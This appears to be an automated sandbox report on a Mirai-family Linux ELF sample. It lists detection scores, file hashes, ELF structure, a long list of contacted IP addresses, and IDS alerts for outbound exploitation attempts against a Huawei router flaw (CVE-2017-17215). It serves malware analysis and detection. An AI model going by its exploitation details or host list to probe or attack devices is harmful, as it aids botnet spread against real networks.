    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1346747 Sample: kTnqWHyjjG.elf Startdate: 23/11/2023 Architecture: LINUX Score: 80 54 94.142.35.129 ZAIN-JO Jordan 2->54 56 94.142.35.134 ZAIN-JO Jordan 2->56 58 99 other IPs or domains 2->58 60 Snort IDS alert for network traffic 2->60 62 Antivirus / Scanner detection for submitted sample 2->62 64 Multi AV Scanner detection for submitted file 2->64 66 3 other signatures 2->66 10 kTnqWHyjjG.elf 2->10         started        signatures3 process4 process5 12 kTnqWHyjjG.elf 10->12         started        14 kTnqWHyjjG.elf 10->14         started        16 kTnqWHyjjG.elf 10->16         started        process6 18 kTnqWHyjjG.elf 12->18         started        20 kTnqWHyjjG.elf 12->20         started        22 kTnqWHyjjG.elf 14->22         started        24 kTnqWHyjjG.elf 14->24         started        26 kTnqWHyjjG.elf 14->26         started        28 2 other processes 14->28 process7 30 kTnqWHyjjG.elf 18->30         started        32 kTnqWHyjjG.elf 18->32         started        34 kTnqWHyjjG.elf 18->34         started        44 2 other processes 18->44 36 kTnqWHyjjG.elf 22->36         started        38 kTnqWHyjjG.elf 22->38         started        40 kTnqWHyjjG.elf 22->40         started        42 kTnqWHyjjG.elf 22->42         started        process8 46 kTnqWHyjjG.elf 30->46         started        48 kTnqWHyjjG.elf 30->48         started        50 kTnqWHyjjG.elf 30->50         started        52 kTnqWHyjjG.elf 30->52         started       

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    kTnqWHyjjG.elf70%ReversingLabsLinux.Trojan.Mirai
    kTnqWHyjjG.elf65%VirustotalBrowse
    kTnqWHyjjG.elf100%AviraEXP/ELF.Mirai.Bootnet.Gen.o
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://192.168.0.14:80/cgi-bin/ViewLog.asp0%Avira URL Cloudsafe

    Download Network PCAP: filteredfull

    NameIPActiveMaliciousAntivirus DetectionReputation
    daisy.ubuntu.com
    162.213.35.25
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://192.168.0.14:80/cgi-bin/ViewLog.aspfalse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://schemas.xmlsoap.org/soap/encoding/kTnqWHyjjG.elffalse
        high
        http://schemas.xmlsoap.org/soap/envelope/kTnqWHyjjG.elffalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          197.123.112.95
          unknownEgypt
          36992ETISALAT-MISREGfalse
          166.184.136.84
          unknownUnited States
          20057ATT-MOBILITY-LLC-AS20057USfalse
          103.89.97.60
          unknownChina
          136368RSPL-ASRathnaaSpectraPrivateLimitedINfalse
          85.248.194.77
          unknownSlovakia (SLOVAK Republic)
          5578AS-BENESTRABratislavaSlovakRepublicSKfalse
          85.19.149.191
          unknownNorway
          25400TELIA-NORWAY-ASTeliaNorwayCoreNetworksNOfalse
          197.75.183.164
          unknownSouth Africa
          16637MTNNS-ASZAfalse
          95.167.9.165
          unknownRussian Federation
          12389ROSTELECOM-ASRUfalse
          68.61.146.230
          unknownUnited States
          7922COMCAST-7922USfalse
          94.142.35.129
          unknownJordan
          48832ZAIN-JOfalse
          85.120.111.185
          unknownRomania
          8708RCS-RDS73-75DrStaicoviciROfalse
          62.235.224.62
          unknownBelgium
          5432PROXIMUS-ISP-ASBEfalse
          62.143.219.8
          unknownGermany
          6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
          101.253.49.214
          unknownChina
          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
          31.240.192.25
          unknownGermany
          3320DTAGInternetserviceprovideroperationsDEfalse
          74.245.242.189
          unknownUnited States
          7018ATT-INTERNET4USfalse
          94.175.48.210
          unknownUnited Kingdom
          5089NTLGBfalse
          48.227.185.173
          unknownUnited States
          2686ATGS-MMD-ASUSfalse
          197.89.97.61
          unknownSouth Africa
          10474OPTINETZAfalse
          94.146.33.97
          unknownDenmark
          9158TELENOR_DANMARK_ASDKfalse
          85.202.224.201
          unknownRussian Federation
          44622MTK-MOSINTER-ASRUfalse
          201.138.200.151
          unknownMexico
          8151UninetSAdeCVMXfalse
          197.123.112.90
          unknownEgypt
          36992ETISALAT-MISREGfalse
          116.166.170.61
          unknownChina
          4847CNIX-APChinaNetworksInter-ExchangeCNfalse
          85.146.193.159
          unknownNetherlands
          33915TNF-ASNLfalse
          62.161.114.246
          unknownFrance
          3215FranceTelecom-OrangeFRfalse
          197.222.170.137
          unknownEgypt
          37069MOBINILEGfalse
          94.177.219.219
          unknownItaly
          31034ARUBA-ASNITfalse
          62.213.110.21
          unknownRussian Federation
          25227ASN-AVANTEL-MSKLocatedinMoscowRussiaRUfalse
          95.122.127.111
          unknownSpain
          3352TELEFONICA_DE_ESPANAESfalse
          95.158.119.71
          unknownPoland
          6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
          94.67.223.110
          unknownGreece
          6799OTENET-GRAthens-GreeceGRfalse
          62.156.228.110
          unknownGermany
          3320DTAGInternetserviceprovideroperationsDEfalse
          70.92.228.168
          unknownUnited States
          10796TWC-10796-MIDWESTUSfalse
          94.232.145.26
          unknownPoland
          39893NETSYSTEM_TP-ASNPLfalse
          41.133.63.43
          unknownSouth Africa
          10474OPTINETZAfalse
          31.199.207.67
          unknownItaly
          3269ASN-IBSNAZITfalse
          108.136.213.184
          unknownUnited States
          16509AMAZON-02USfalse
          94.71.14.158
          unknownGreece
          6799OTENET-GRAthens-GreeceGRfalse
          156.223.192.127
          unknownEgypt
          8452TE-ASTE-ASEGfalse
          31.233.207.173
          unknownGermany
          3320DTAGInternetserviceprovideroperationsDEfalse
          95.217.66.156
          unknownGermany
          24940HETZNER-ASDEfalse
          212.30.125.197
          unknownFrance
          12626AS12626FRfalse
          62.191.178.96
          unknownUnited Kingdom
          5586MCI-INTGBfalse
          62.81.118.81
          unknownSpain
          6739ONO-ASCableuropa-ONOESfalse
          210.149.17.77
          unknownJapan2497IIJInternetInitiativeJapanIncJPfalse
          197.51.4.222
          unknownEgypt
          8452TE-ASTE-ASEGfalse
          95.36.120.162
          unknownNetherlands
          15670BBNED-AS1NLfalse
          41.210.115.184
          unknownunknown
          29614GHANATEL-ASGHfalse
          76.119.142.150
          unknownUnited States
          7922COMCAST-7922USfalse
          31.127.110.212
          unknownUnited Kingdom
          12576EELtdGBfalse
          160.192.123.124
          unknownJapan7670CTNETEnergiaCommunicationsIncJPfalse
          94.84.106.248
          unknownItaly
          3269ASN-IBSNAZITfalse
          85.4.129.134
          unknownSwitzerland
          3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
          41.140.123.120
          unknownMorocco
          36903MT-MPLSMAfalse
          85.147.58.3
          unknownNetherlands
          33915TNF-ASNLfalse
          244.34.202.110
          unknownReserved
          unknownunknownfalse
          95.170.75.142
          unknownNetherlands
          20857TRANSIP-ASAmsterdamtheNetherlandsNLfalse
          62.187.196.226
          unknownEuropean Union
          34456RIALCOM-ASRUfalse
          62.235.224.88
          unknownBelgium
          5432PROXIMUS-ISP-ASBEfalse
          31.238.72.86
          unknownGermany
          3320DTAGInternetserviceprovideroperationsDEfalse
          62.114.184.217
          unknownEgypt
          36992ETISALAT-MISREGfalse
          197.173.155.76
          unknownSouth Africa
          37168CELL-CZAfalse
          94.154.174.132
          unknownGermany
          10753LVLT-10753USfalse
          2.183.169.7
          unknownIran (ISLAMIC Republic Of)
          58224TCIIRfalse
          220.68.20.86
          unknownKorea Republic of
          18038KNUE-AS-KRKoreaNationalUniversityofEducationKRfalse
          197.92.49.6
          unknownSouth Africa
          10474OPTINETZAfalse
          194.135.149.76
          unknownRussian Federation
          60098INSITINVEST-ASRUfalse
          160.58.147.47
          unknownGermany
          12291DPAG-ASDeutschePostAGDEfalse
          248.95.169.78
          unknownReserved
          unknownunknownfalse
          94.236.86.108
          unknownUnited Kingdom
          15395RACKSPACE-LONGBfalse
          250.104.153.187
          unknownReserved
          unknownunknownfalse
          94.142.35.134
          unknownJordan
          48832ZAIN-JOfalse
          95.56.47.19
          unknownKazakhstan
          9198KAZTELECOM-ASKZfalse
          94.85.243.22
          unknownItaly
          3269ASN-IBSNAZITfalse
          95.121.68.49
          unknownSpain
          3352TELEFONICA_DE_ESPANAESfalse
          187.157.113.43
          unknownMexico
          8151UninetSAdeCVMXfalse
          122.33.60.149
          unknownKorea Republic of
          17858POWERVIS-AS-KRLGPOWERCOMMKRfalse
          62.39.77.51
          unknownFrance
          29322STREAMWIDE-ASThecompanySTREAMWIDElocatedinParisFrancfalse
          197.221.180.227
          unknownSouth Africa
          37356O-TelZAfalse
          94.224.166.187
          unknownBelgium
          6848TELENET-ASBEfalse
          95.212.118.93
          unknownEgypt
          51167CONTABODEfalse
          85.193.76.25
          unknownRussian Federation
          209231CCNLfalse
          62.147.6.200
          unknownFrance
          12322PROXADFRfalse
          60.193.250.237
          unknownJapan9595XEPHIONNTT-MECorporationJPfalse
          85.57.45.42
          unknownSpain
          12479UNI2-ASESfalse
          69.74.25.73
          unknownUnited States
          39981STONE-POINT-CAPITAL-PUBLICUSfalse
          95.78.79.169
          unknownRussian Federation
          42116ERTH-NCHLN-ASRUfalse
          62.40.187.39
          unknownAustria
          8339KABSI-ASATfalse
          95.29.218.0
          unknownRussian Federation
          8402CORBINA-ASOJSCVimpelcomRUfalse
          85.152.66.234
          unknownSpain
          12946TELECABLESpainESfalse
          95.252.144.216
          unknownItaly
          3269ASN-IBSNAZITfalse
          94.159.123.210
          unknownRussian Federation
          49531NETCOM-R-ASRUfalse
          31.163.215.156
          unknownRussian Federation
          12389ROSTELECOM-ASRUfalse
          95.31.226.2
          unknownRussian Federation
          3216SOVAM-ASRUfalse
          95.253.134.191
          unknownItaly
          3269ASN-IBSNAZITfalse
          62.99.215.113
          unknownAustria
          6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
          95.167.9.124
          unknownRussian Federation
          12389ROSTELECOM-ASRUfalse
          182.93.62.100
          unknownMacau
          4609CTM-MOCompanhiadeTelecomunicacoesdeMacauSARLMOfalse
          62.145.208.64
          unknownNetherlands
          33915TNF-ASNLfalse
          62.125.244.172
          unknownUnited Kingdom
          702UUNETUSfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          85.120.111.185jGuKZgjBg9.elfGet hashmaliciousMiraiBrowse
            KLAbE2XW4iGet hashmaliciousMiraiBrowse
              lv2E1Fn8EoGet hashmaliciousMiraiBrowse
                62.235.224.62kis3Ve51fHGet hashmaliciousMiraiBrowse
                  197.123.112.95bok.arm4-20230315-2115.elfGet hashmaliciousMiraiBrowse
                    qDcHjUe1i4Get hashmaliciousMiraiBrowse
                      103.89.97.60uK9IVzZB9GGet hashmaliciousMiraiBrowse
                        85.248.194.775jUkXrwnO2Get hashmaliciousMiraiBrowse
                          85.19.149.191ZdGYNQo3s7.elfGet hashmaliciousMiraiBrowse
                            UnHAnaAW.arm7Get hashmaliciousMiraiBrowse
                              UnHAnaAW.x86Get hashmaliciousMiraiBrowse
                                197.75.183.1649BrsO1bmfY.elfGet hashmaliciousMiraiBrowse
                                  x86-20220620-2150Get hashmaliciousMiraiBrowse
                                    x86Get hashmaliciousMiraiBrowse
                                      zhhGqcYzaoGet hashmaliciousBrowse
                                        95.167.9.165V2gmMU6VkyGet hashmaliciousMiraiBrowse
                                          68.61.146.230kwPF1TJUflGet hashmaliciousMiraiBrowse
                                            94.142.35.129seL794VuEmGet hashmaliciousMiraiBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              daisy.ubuntu.comSecuriteInfo.com.Linux.Siggen.9999.16820.21768.elfGet hashmaliciousUnknownBrowse
                                              • 162.213.35.24
                                              us9PB27jo7.elfGet hashmaliciousUnknownBrowse
                                              • 162.213.35.25
                                              yWVLQIrdCC.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.25
                                              ZenY9BAc8B.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.25
                                              v5S9SdJgPx.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.25
                                              UbaytFXa8M.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.24
                                              ccbS3mSC4n.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.25
                                              qJY7qgxKYq.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.25
                                              WzpinhzvZl.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.25
                                              7vbrDg2AF5.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.25
                                              FIsa4cAdDc.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.25
                                              5OGAx17mRN.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.24
                                              wqZAwYmjjD.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.25
                                              2EgdpgJdKe.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.24
                                              RfLJBx6qoS.elfGet hashmaliciousUnknownBrowse
                                              • 162.213.35.24
                                              cool.x86.elfGet hashmaliciousUnknownBrowse
                                              • 162.213.35.24
                                              SecuriteInfo.com.Linux.Siggen.9999.20159.633.elfGet hashmaliciousUnknownBrowse
                                              • 162.213.35.24
                                              top1hbt.arm6.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.24
                                              arm.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.25
                                              x86.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.25
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ATT-MOBILITY-LLC-AS20057USccbS3mSC4n.elfGet hashmaliciousMiraiBrowse
                                              • 32.179.229.77
                                              Y6IWvuzItZ.elfGet hashmaliciousMiraiBrowse
                                              • 166.192.204.135
                                              WU3D24p3h0.elfGet hashmaliciousMiraiBrowse
                                              • 166.171.249.232
                                              a6YpIDPSBI.elfGet hashmaliciousMiraiBrowse
                                              • 166.206.30.134
                                              jo7EyIiUsZ.elfGet hashmaliciousMiraiBrowse
                                              • 166.191.214.240
                                              2jtSIERpll.elfGet hashmaliciousMiraiBrowse
                                              • 166.194.255.160
                                              G1vp1p1HjW.elfGet hashmaliciousMiraiBrowse
                                              • 32.191.153.133
                                              VfMVlDMUYO.elfGet hashmaliciousMiraiBrowse
                                              • 32.183.138.134
                                              IDBcD0M2UK.elfGet hashmaliciousMiraiBrowse
                                              • 166.202.191.244
                                              wIv2iUofVo.elfGet hashmaliciousMiraiBrowse
                                              • 155.167.81.213
                                              xpQJmpNCvU.elfGet hashmaliciousUnknownBrowse
                                              • 166.200.51.33
                                              u3FxQf1X9v.elfGet hashmaliciousMiraiBrowse
                                              • 32.180.119.82
                                              8zb8fo2h7Z.elfGet hashmaliciousMiraiBrowse
                                              • 107.238.216.72
                                              rdOFF4zYjr.elfGet hashmaliciousMiraiBrowse
                                              • 32.190.59.208
                                              prVqJIASVB.elfGet hashmaliciousMiraiBrowse
                                              • 166.199.204.241
                                              Lf7tF1qhnU.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 107.95.104.11
                                              skid.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 166.176.177.19
                                              skid.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 32.180.120.60
                                              DA95yGHg7R.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 107.95.169.120
                                              pmJQMo2I4U.elfGet hashmaliciousMiraiBrowse
                                              • 166.178.53.229
                                              ETISALAT-MISREGyWVLQIrdCC.elfGet hashmaliciousMiraiBrowse
                                              • 84.36.99.224
                                              Y6IWvuzItZ.elfGet hashmaliciousMiraiBrowse
                                              • 105.95.172.38
                                              7vbrDg2AF5.elfGet hashmaliciousMiraiBrowse
                                              • 197.120.220.115
                                              SIFex0dc75.elfGet hashmaliciousMiraiBrowse
                                              • 197.123.112.64
                                              BMXYo1Gliu.elfGet hashmaliciousMiraiBrowse
                                              • 62.114.184.219
                                              SecuriteInfo.com.Linux.Siggen.9999.5057.31485.elfGet hashmaliciousMiraiBrowse
                                              • 62.114.184.200
                                              WU3D24p3h0.elfGet hashmaliciousMiraiBrowse
                                              • 62.114.184.230
                                              yP1n2CG3Da.elfGet hashmaliciousMiraiBrowse
                                              • 156.166.35.136
                                              R6rFR8cH9t.elfGet hashmaliciousMiraiBrowse
                                              • 197.196.137.170
                                              OcP69T7wlk.elfGet hashmaliciousMiraiBrowse
                                              • 156.161.230.64
                                              G1vp1p1HjW.elfGet hashmaliciousMiraiBrowse
                                              • 62.139.1.93
                                              Bt4Vc4lw3J.elfGet hashmaliciousMiraiBrowse
                                              • 156.162.60.220
                                              skid.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 156.171.71.151
                                              skid.x86.elfGet hashmaliciousMiraiBrowse
                                              • 197.197.198.252
                                              5eFmWG76zz.elfGet hashmaliciousMiraiBrowse
                                              • 84.233.19.153
                                              wIv2iUofVo.elfGet hashmaliciousMiraiBrowse
                                              • 84.36.99.227
                                              idYcZwGPgA.elfGet hashmaliciousMiraiBrowse
                                              • 102.56.159.220
                                              ZC0XIKa5GN.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 156.182.39.129
                                              pitNTFQSoH.elfGet hashmaliciousMiraiBrowse
                                              • 105.94.59.194
                                              DA95yGHg7R.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 197.121.74.187
                                              RSPL-ASRathnaaSpectraPrivateLimitedINlyjROImFLY.elfGet hashmaliciousUnknownBrowse
                                              • 103.89.97.79
                                              nQJ6ril1IK.elfGet hashmaliciousMiraiBrowse
                                              • 103.89.97.78
                                              h25L9k22cq.elfGet hashmaliciousMiraiBrowse
                                              • 103.89.97.99
                                              sora.arm.elfGet hashmaliciousMiraiBrowse
                                              • 103.89.97.95
                                              a7u8pO43bE.elfGet hashmaliciousMiraiBrowse
                                              • 103.89.97.70
                                              HagARZjY7Y.elfGet hashmaliciousMiraiBrowse
                                              • 103.89.97.79
                                              jew.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 103.89.97.77
                                              sora.arm.elfGet hashmaliciousMiraiBrowse
                                              • 103.89.97.81
                                              C6oZDU5cHjGet hashmaliciousMiraiBrowse
                                              • 103.89.97.93
                                              miori.x86-20220709-0150Get hashmaliciousMiraiBrowse
                                              • 103.89.97.63
                                              arm7Get hashmaliciousMiraiBrowse
                                              • 103.89.97.84
                                              s9WBeaPw46Get hashmaliciousMiraiBrowse
                                              • 103.89.97.99
                                              uK9IVzZB9GGet hashmaliciousMiraiBrowse
                                              • 103.89.97.60
                                              Yoshi.arm-20211110-0350Get hashmaliciousMiraiBrowse
                                              • 103.89.97.59
                                              sh1i15951IGet hashmaliciousMiraiBrowse
                                              • 103.89.97.62
                                              G5vJ46b8cwGet hashmaliciousMiraiBrowse
                                              • 103.89.97.74
                                              o3sZiaUUZaGet hashmaliciousMiraiBrowse
                                              • 103.89.97.97
                                              c0r0n4x.x86Get hashmaliciousMiraiBrowse
                                              • 103.89.97.77
                                              No context
                                              No context
                                              No created / dropped files found
                                              File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                                              Entropy (8bit):6.319153535733825
                                              TrID:
                                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                              File name:kTnqWHyjjG.elf
                                              File size:64'932 bytes
                                              MD5:65ec014b5a11c78b8bdf0aced777184e
                                              SHA1:14b95aa0d0388fc87d8fa7f94f08654deec1a376
                                              SHA256:6a3a24b1175e550f0d0237472d7f937968fbdfa5e200c9ca7f5e70eea48f8533
                                              SHA512:4146f6941fbbd4b619191c472bd9250c33df53a6612a13d14505e7ad0515937dbad801161511fc842dd15414625d7328df9efe32f65330db9f8718987be65f2d
                                              SSDEEP:768:CewC7tPUFA5CnYtJPV2vOm6NneNbWA75NuYeehwxSikSfzP8uU6NfyoT8lpIQ:Ce7CFXnYfANbh8YRZYP8uZNfN8rF
                                              TLSH:BA536CD6B8129E3CF98BE6B980230E09F521731546930B27B7A6FCD37D73194D946E82
                                              File Content Preview:.ELF.......................D...4.........4. ...(.................................. ....................$.......... .dt.Q............................NV..a....da.....N^NuNV..J9....f>"y.... QJ.g.X.#.....N."y.... QJ.f.A.....J.g.Hy....N.X.........N^NuNV..N^NuN

                                              ELF header

                                              Class:ELF32
                                              Data:2's complement, big endian
                                              Version:1 (current)
                                              Machine:MC68000
                                              Version Number:0x1
                                              Type:EXEC (Executable file)
                                              OS/ABI:UNIX - System V
                                              ABI Version:0
                                              Entry Point Address:0x80000144
                                              Flags:0x0
                                              ELF Header Size:52
                                              Program Header Offset:52
                                              Program Header Size:32
                                              Number of Program Headers:3
                                              Section Header Offset:64532
                                              Section Header Size:40
                                              Number of Section Headers:10
                                              Header String Table Index:9
                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                              NULL0x00x00x00x00x0000
                                              .initPROGBITS0x800000940x940x140x00x6AX002
                                              .textPROGBITS0x800000a80xa80xee020x00x6AX004
                                              .finiPROGBITS0x8000eeaa0xeeaa0xe0x00x6AX002
                                              .rodataPROGBITS0x8000eeb80xeeb80xaf40x00x2A002
                                              .ctorsPROGBITS0x800119b00xf9b00x80x00x3WA004
                                              .dtorsPROGBITS0x800119b80xf9b80x80x00x3WA004
                                              .dataPROGBITS0x800119c40xf9c40x2100x00x3WA004
                                              .bssNOBITS0x80011bd40xfbd40x2a40x00x3WA004
                                              .shstrtabSTRTAB0x00xfbd40x3e0x00x0001
                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                              LOAD0x00x800000000x800000000xf9ac0xf9ac6.34890x5R E0x2000.init .text .fini .rodata
                                              LOAD0xf9b00x800119b00x800119b00x2240x4c83.03580x6RW 0x2000.ctors .dtors .data .bss
                                              GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                                              Download Network PCAP: filteredfull

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              192.168.2.14156.198.243.12354822372152829579 11/23/23-05:16:11.722955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5482237215192.168.2.14156.198.243.123
                                              192.168.2.14156.226.15.20942390372152835222 11/23/23-05:14:51.326800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239037215192.168.2.14156.226.15.209
                                              192.168.2.14156.254.81.641282372152835222 11/23/23-05:16:10.784114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4128237215192.168.2.14156.254.81.6
                                              192.168.2.14156.241.87.24155360372152835222 11/23/23-05:17:58.691726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536037215192.168.2.14156.241.87.241
                                              192.168.2.14156.254.78.16552240372152829579 11/23/23-05:18:16.924442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5224037215192.168.2.14156.254.78.165
                                              192.168.2.1441.42.86.21650140372152829579 11/23/23-05:18:06.959996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5014037215192.168.2.1441.42.86.216
                                              192.168.2.14156.226.11.9043244372152829579 11/23/23-05:17:54.238534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4324437215192.168.2.14156.226.11.90
                                              192.168.2.14156.241.82.25554550372152829579 11/23/23-05:18:17.214338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5455037215192.168.2.14156.241.82.255
                                              192.168.2.14156.235.103.20644226372152829579 11/23/23-05:14:52.208909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4422637215192.168.2.14156.235.103.206
                                              192.168.2.14156.241.87.24155360372152829579 11/23/23-05:17:58.691726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536037215192.168.2.14156.241.87.241
                                              192.168.2.14156.241.101.14159218372152829579 11/23/23-05:18:15.036113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5921837215192.168.2.14156.241.101.141
                                              192.168.2.14156.198.243.12354822372152835222 11/23/23-05:16:11.722955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5482237215192.168.2.14156.198.243.123
                                              192.168.2.14156.226.15.20942390372152829579 11/23/23-05:14:51.326800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239037215192.168.2.14156.226.15.209
                                              192.168.2.14156.241.82.25554550372152835222 11/23/23-05:18:17.214338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5455037215192.168.2.14156.241.82.255
                                              192.168.2.1441.40.32.14044612372152835222 11/23/23-05:18:23.200632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4461237215192.168.2.1441.40.32.140
                                              192.168.2.14156.254.76.24759846372152835222 11/23/23-05:15:39.627754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5984637215192.168.2.14156.254.76.247
                                              192.168.2.1441.62.237.6236050372152835222 11/23/23-05:18:15.887851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3605037215192.168.2.1441.62.237.62
                                              192.168.2.14156.254.88.14835652372152829579 11/23/23-05:14:51.327318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565237215192.168.2.14156.254.88.148
                                              192.168.2.14156.241.101.14159218372152835222 11/23/23-05:18:15.036113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5921837215192.168.2.14156.241.101.141
                                              192.168.2.14156.241.89.17151982372152835222 11/23/23-05:17:17.815543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5198237215192.168.2.14156.241.89.171
                                              192.168.2.14156.241.82.21751080372152829579 11/23/23-05:17:32.493865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5108037215192.168.2.14156.241.82.217
                                              192.168.2.14156.254.81.641282372152829579 11/23/23-05:16:10.784114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4128237215192.168.2.14156.254.81.6
                                              192.168.2.14156.241.92.16460320372152829579 11/23/23-05:16:16.383093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6032037215192.168.2.14156.241.92.164
                                              192.168.2.14156.235.103.20644226372152835222 11/23/23-05:14:52.208909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4422637215192.168.2.14156.235.103.206
                                              192.168.2.14156.254.76.24759846372152829579 11/23/23-05:15:39.627754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5984637215192.168.2.14156.254.76.247
                                              192.168.2.14156.230.23.5352056372152835222 11/23/23-05:16:09.442783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5205637215192.168.2.14156.230.23.53
                                              192.168.2.14156.241.92.9541782372152829579 11/23/23-05:18:13.638203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4178237215192.168.2.14156.241.92.95
                                              192.168.2.1441.239.35.5851906372152835222 11/23/23-05:18:08.363086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5190637215192.168.2.1441.239.35.58
                                              192.168.2.1441.42.88.859458372152835222 11/23/23-05:15:52.366087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5945837215192.168.2.1441.42.88.8
                                              192.168.2.14156.241.15.15540606372152835222 11/23/23-05:17:10.591775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4060637215192.168.2.14156.241.15.155
                                              192.168.2.14156.254.85.18540842372152835222 11/23/23-05:15:00.708035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4084237215192.168.2.14156.254.85.185
                                              192.168.2.1441.239.73.17333132372152835222 11/23/23-05:17:13.165158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3313237215192.168.2.1441.239.73.173
                                              192.168.2.14156.254.71.3442532372152829579 11/23/23-05:17:24.534405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4253237215192.168.2.14156.254.71.34
                                              192.168.2.14156.253.40.24140022372152835222 11/23/23-05:18:16.917737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4002237215192.168.2.14156.253.40.241
                                              192.168.2.14156.254.78.16552240372152835222 11/23/23-05:18:16.924442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5224037215192.168.2.14156.254.78.165
                                              192.168.2.14197.3.213.25339794372152829579 11/23/23-05:18:17.098302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3979437215192.168.2.14197.3.213.253
                                              192.168.2.1441.250.5.1347142372152829579 11/23/23-05:15:42.846567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4714237215192.168.2.1441.250.5.13
